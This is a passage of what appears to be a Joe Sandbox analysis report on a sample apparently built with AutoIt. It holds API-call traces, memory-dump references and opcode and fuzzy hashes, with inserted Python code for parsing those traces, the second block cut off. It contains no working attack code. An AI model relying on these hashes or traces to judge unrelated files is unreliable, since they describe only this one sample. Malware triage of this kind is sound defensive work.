                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction ID: 23cc42bcfd0f5f3b85442975d40a2d3e066c059c75d65d5c6bead454d2901792
                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction Fuzzy Hash: 0FC185322050930ADF2D463DC4750BEBBA25EA37B131A975ED4BBCF2D5EE10C965D620
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction ID: 3e887c24c0f461381d7697b296991d9c6917d4242e11780e523e4f1ab158333f
                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction Fuzzy Hash: 6DC1A8322051930ADF2D463EC43507EBBA25EA37B131A576ED4BBDF2D4EE20C925D620
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction ID: 22c2e48820d6fe1f846c86f9bb9f02a7d0699e0dd59e91c03ee8927eefdfc4bd
                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction Fuzzy Hash: 6FC184322051930ADF2D463D84751BEBAA25EA37B131A975FD4BADF2C4FE20C925DA10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction ID: 0cd52ee6d37e09923d1cc01da92376dcd0e44fac7000d199ef04f541cefc9962
                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction Fuzzy Hash: 5F41A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction ID: 4f5d17e1e56b71fab0598c1703d046e50bfd336d14e1503a986fe1b93dd484ca
                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                    • Instruction Fuzzy Hash: A801D278A10209EFCB84DF98C5809AEF7B5FB48310F248199D909A7700D734EE81DB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                    • Instruction ID: ce49d1a951a4582a1b58a2fedb35d132a337886d739d0bf9a3b559f8e982f3bf
                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                    • Instruction Fuzzy Hash: 8F019278A11209EFCB44DF98C5909AEF7F5FB48310F248599D909A7701D731AE81DB81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 006C785B
                                                    • DeleteObject.GDI32(00000000), ref: 006C786D
                                                    • DestroyWindow.USER32 ref: 006C787B
                                                    • GetDesktopWindow.USER32 ref: 006C7895
                                                    • GetWindowRect.USER32(00000000), ref: 006C789C
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006C79DD
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006C79ED
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7A35
                                                    • GetClientRect.USER32(00000000,?), ref: 006C7A41
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006C7A7B
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7A9D
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7AB0
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7ABB
                                                    • GlobalLock.KERNEL32(00000000), ref: 006C7AC4
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7AD3
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 006C7ADC
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7AE3
                                                    • GlobalFree.KERNEL32(00000000), ref: 006C7AEE
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7B00
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006E2CAC,00000000), ref: 006C7B16
                                                    • GlobalFree.KERNEL32(00000000), ref: 006C7B26
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 006C7B4C
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 006C7B6B
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7B8D
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7D7A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-3613752883
                                                    • Opcode ID: 205d0107c15c1f328159f3e95b6c3d5c0b1fc966b559eee90e76cf5960aedeec
                                                    • Instruction ID: 5909f4a7d443d0f1a304ea0c3652af53ac0f06331d7d502c02b8de60bd3c2a61
                                                    • Opcode Fuzzy Hash: 205d0107c15c1f328159f3e95b6c3d5c0b1fc966b559eee90e76cf5960aedeec
                                                    • Instruction Fuzzy Hash: 3F023971901115EFDB14DFA8DC89EAE7BBAEF48310F148169F916AB2A1C734AD01CF64
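The record above (call site 006C785B onward) and the progress-dialog record later on this page (006C74DE onward) are the two places where the "APIs" block shows the AutoIt runtime's own GUI helpers: a window of class "AutoIt v3", a file read into an HGLOBAL, CreateStreamOnHGlobal, OleLoadPicture and an STM_SETIMAGE (0x172) message to a "static" control for a splash image; and a "msctls_progress32" control followed by PBM_SETRANGE (0x401) for a progress bar. The following is an added example, not part of the Joe Sandbox report: a parser for the "APIs" line format shown in these records, plus a check that flags those AutoIt GUI markers in trace order. The sample traces are constructed from lines copied from the two records; STM_SETIMAGE and PBM_SETRANGE are the documented Win32 message values, and the `ApiCall`, `parse_api_trace` and `autoit_gui_markers` names are this example's own.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Optional

# One "APIs" entry of a Joe Sandbox function record. The three shapes seen on this page:
#   • CreateWindowExW.USER32(00000002,AutoIt v3,...), ref: 006C7A35
#   • DestroyWindow.USER32 ref: 006C787B                      (no argument list)
#     • Part of subcall function 006DA8CA: GetSysColor.USER32(00000012), ref: 006DA903
_API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw hex words, string literals, or '?' for an unresolved argument
    ref: int                 # call-site address inside the dumped image
    subcall: Optional[int]   # callee address when the line is "Part of subcall function"


def parse_api_trace(text: str) -> List[ApiCall]:
    """Turn the APIs block of one function record into ApiCall objects, in trace order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue  # "APIs", "Strings" and other headers carry no call
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


# Documented Win32 message values
STM_SETIMAGE = 0x172   # static control: attach a bitmap/icon
PBM_SETRANGE = 0x401   # progress bar: WM_USER + 1


def _hexarg(a: str) -> Optional[int]:
    try:
        return int(a, 16)
    except ValueError:
        return None  # '?' or a string literal such as 'AutoIt v3'


def _first(calls: List[ApiCall], pred: Callable[[ApiCall], bool]) -> Optional[int]:
    return next((i for i, c in enumerate(calls) if pred(c)), None)


def _sends(msg: int) -> Callable[[ApiCall], bool]:
    return lambda c: c.api == "SendMessageW" and len(c.args) > 1 and _hexarg(c.args[1]) == msg


def _creates(window_class: str) -> Callable[[ApiCall], bool]:
    return lambda c: c.api == "CreateWindowExW" and len(c.args) > 1 and c.args[1] == window_class


def autoit_gui_markers(calls: List[ApiCall]) -> dict:
    """Flag the AutoIt interpreter GUI helpers visible in the traces on this page:
    a window of class 'AutoIt v3'; OleLoadPicture followed by STM_SETIMAGE (splash image);
    msctls_progress32 followed by PBM_SETRANGE (progress dialog).
    Order matters, so the checks compare positions in the trace, not just presence."""
    load = _first(calls, lambda c: c.api == "OleLoadPicture")
    setimg = _first(calls, _sends(STM_SETIMAGE))
    prog = _first(calls, _creates("msctls_progress32"))
    setrange = _first(calls, _sends(PBM_SETRANGE))
    return {
        "autoit_window_class": _first(calls, _creates("AutoIt v3")) is not None,
        "splash_image": load is not None and setimg is not None and load < setimg,
        "progress_dialog": prog is not None and setrange is not None and prog < setrange,
    }


# Constructed samples: lines copied from the splash-image record (006C785B..) and the
# progress-dialog record (006C74DE..) of this report, trimmed to the calls that matter.
SPLASH_TRACE = """\
APIs
• DeleteObject.GDI32(00000000), ref: 006C785B
• DestroyWindow.USER32 ref: 006C787B
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7A35
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006C7A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7A9D
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7AD3
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006E2CAC,00000000), ref: 006C7B16
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 006C7B6B
Strings
"""

PROGRESS_TRACE = """\
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006C7633
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006C7746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006C775A
  • Part of subcall function 006DA8CA: GetSysColor.USER32(00000012), ref: 006DA903
"""

if __name__ == "__main__":
    for name, trace in (("splash", SPLASH_TRACE), ("progress", PROGRESS_TRACE)):
        print(name, autoit_gui_markers(parse_api_trace(trace)))
```

The parser keeps `?` arguments as-is rather than dropping them, because the argument position (second parameter of CreateWindowExW is the class name, second parameter of SendMessageW is the message) is what the marker checks key on; collapsing unresolved arguments would shift those positions. The same parser can be pointed at any other "APIs" block in this report.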
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 006DA630
                                                    • GetSysColorBrush.USER32(0000000F), ref: 006DA661
                                                    • GetSysColor.USER32(0000000F), ref: 006DA66D
                                                    • SetBkColor.GDI32(?,000000FF), ref: 006DA687
                                                    • SelectObject.GDI32(?,00000000), ref: 006DA696
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 006DA6C1
                                                    • GetSysColor.USER32(00000010), ref: 006DA6C9
                                                    • CreateSolidBrush.GDI32(00000000), ref: 006DA6D0
                                                    • FrameRect.USER32(?,?,00000000), ref: 006DA6DF
                                                    • DeleteObject.GDI32(00000000), ref: 006DA6E6
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 006DA731
                                                    • FillRect.USER32(?,?,00000000), ref: 006DA763
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006DA78E
                                                      • Part of subcall function 006DA8CA: GetSysColor.USER32(00000012), ref: 006DA903
                                                      • Part of subcall function 006DA8CA: SetTextColor.GDI32(?,?), ref: 006DA907
                                                      • Part of subcall function 006DA8CA: GetSysColorBrush.USER32(0000000F), ref: 006DA91D
                                                      • Part of subcall function 006DA8CA: GetSysColor.USER32(0000000F), ref: 006DA928
                                                      • Part of subcall function 006DA8CA: GetSysColor.USER32(00000011), ref: 006DA945
                                                      • Part of subcall function 006DA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006DA953
                                                      • Part of subcall function 006DA8CA: SelectObject.GDI32(?,00000000), ref: 006DA964
                                                      • Part of subcall function 006DA8CA: SetBkColor.GDI32(?,00000000), ref: 006DA96D
                                                      • Part of subcall function 006DA8CA: SelectObject.GDI32(?,?), ref: 006DA97A
                                                      • Part of subcall function 006DA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 006DA999
                                                      • Part of subcall function 006DA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006DA9B0
                                                      • Part of subcall function 006DA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 006DA9C5
                                                      • Part of subcall function 006DA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006DA9ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                    • String ID: @U=u
                                                    • API String ID: 3521893082-2594219639
                                                    • Opcode ID: 0eec560b87024ee6d7055d7a747cb3e58261a69c5d036410f89542c15e048932
                                                    • Instruction ID: 20669eb3e16e033b3173fcfff75a15aedd6c7943c1d3346d39a0faa57c68647e
                                                    • Opcode Fuzzy Hash: 0eec560b87024ee6d7055d7a747cb3e58261a69c5d036410f89542c15e048932
                                                    • Instruction Fuzzy Hash: 83918E72809301FFC7109FA4DC08A5B7BAAFF89321F145B2AF962962E0D771D945CB52
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,006DF910), ref: 006D3627
                                                    • IsWindowVisible.USER32(?), ref: 006D364B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-3469695742
                                                    • Opcode ID: 0b04f97e317a1f912f0a6502f6d27ffb572ee9759287b2657a41a82a062aea23
                                                    • Instruction ID: 78a28a69cc4ad846462451ae3e55c495c6c1364cd69cbf0973519521d12822d9
                                                    • Opcode Fuzzy Hash: 0b04f97e317a1f912f0a6502f6d27ffb572ee9759287b2657a41a82a062aea23
                                                    • Instruction Fuzzy Hash: 31D16B30A04311DBCB44EF10C852AAE77A3AF95754F14856DF8865B3E3DB21EE0ACB56
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?), ref: 00652CA2
                                                    • DeleteObject.GDI32(00000000), ref: 00652CE8
                                                    • DeleteObject.GDI32(00000000), ref: 00652CF3
                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00652CFE
                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00652D09
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0068C43B
                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0068C474
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0068C89D
                                                      • Part of subcall function 00651B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00652036,?,00000000,?,?,?,?,006516CB,00000000,?), ref: 00651B9A
                                                    • SendMessageW.USER32(?,00001053), ref: 0068C8DA
                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0068C8F1
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0068C907
                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0068C912
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                    • String ID: 0$@U=u
                                                    • API String ID: 464785882-975001249
                                                    • Opcode ID: 55c09651648ba52b3562c374ec30104f113174cc9f5562886d15246775a7c378
                                                    • Instruction ID: af2779c4717c965e11ab7300a835550a4f8f3703135b776d5aec98fccbbc92d3
                                                    • Opcode Fuzzy Hash: 55c09651648ba52b3562c374ec30104f113174cc9f5562886d15246775a7c378
                                                    • Instruction Fuzzy Hash: 8412A030500202DFDB51DF24C894BA9BBE2FF45321F548669F856DB662C731E896CBA1
                                                    APIs
                                                    • DestroyWindow.USER32(00000000), ref: 006C74DE
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006C759D
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006C75DB
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006C75ED
                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006C7633
                                                    • GetClientRect.USER32(00000000,?), ref: 006C763F
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 006C7683
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006C7692
                                                    • GetStockObject.GDI32(00000011), ref: 006C76A2
                                                    • SelectObject.GDI32(00000000,00000000), ref: 006C76A6
                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006C76B6
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006C76BF
                                                    • DeleteDC.GDI32(00000000), ref: 006C76C8
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006C76F4
                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 006C770B
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006C7746
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006C775A
                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 006C776B
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 006C779B
                                                    • GetStockObject.GDI32(00000011), ref: 006C77A6
                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006C77B1
                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006C77BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-2771358697
                                                    • Opcode ID: 283ec8ff5ad3df5687cacb4e3b5ae679a176c1784b96728fad207b5be36b4892
                                                    • Instruction ID: dc6deae6380c6f893995c614310f941822070bb2c337c09e73da82d74a58d58c
                                                    • Opcode Fuzzy Hash: 283ec8ff5ad3df5687cacb4e3b5ae679a176c1784b96728fad207b5be36b4892
                                                    • Instruction Fuzzy Hash: 5AA164B1A40615FFEB14DB68DC4AFAE77BAEB44710F048119FA15A72E0C774AD00CB64
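Every function record in this part of the report has the same layout: an APIs list (each call with module, arguments and the `ref:` address in the dump), the memory dump the function was lifted from, and a Similarity block whose Opcode ID and Instruction Fuzzy Hash are the values worth pivoting on when checking whether another sample carries the same AutoIt runtime stub. The following is an added example, not Joe Sandbox code, that parses that layout out of the report text; the format is inferred from the records on this page and the SAMPLE text is an excerpt of two of them (string tables shortened), including the "Download File" link label the HTML export glues onto dump names.

```python
"""Added example: parse Joe Sandbox per-function records (APIs / Strings /
Memory Dump Source / Similarity blocks) into dicts so Opcode IDs, fuzzy
hashes and referenced strings can be pivoted across reports.
Not Joe Sandbox code; the format is inferred from the page."""
import re
from textwrap import dedent

# One API line.  Three shapes occur on the page:
#   GetDriveTypeW.KERNEL32(?,006DFAC0,?,\\.\,006DF910), ref: 006BADFB
#   _memset.LIBCMT ref: 006D8C44
#   Part of subcall function 00652344: GetCursorPos.USER32(?), ref: 00652357
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^(?P<key>[^:]+): (?P<val>.*)$")
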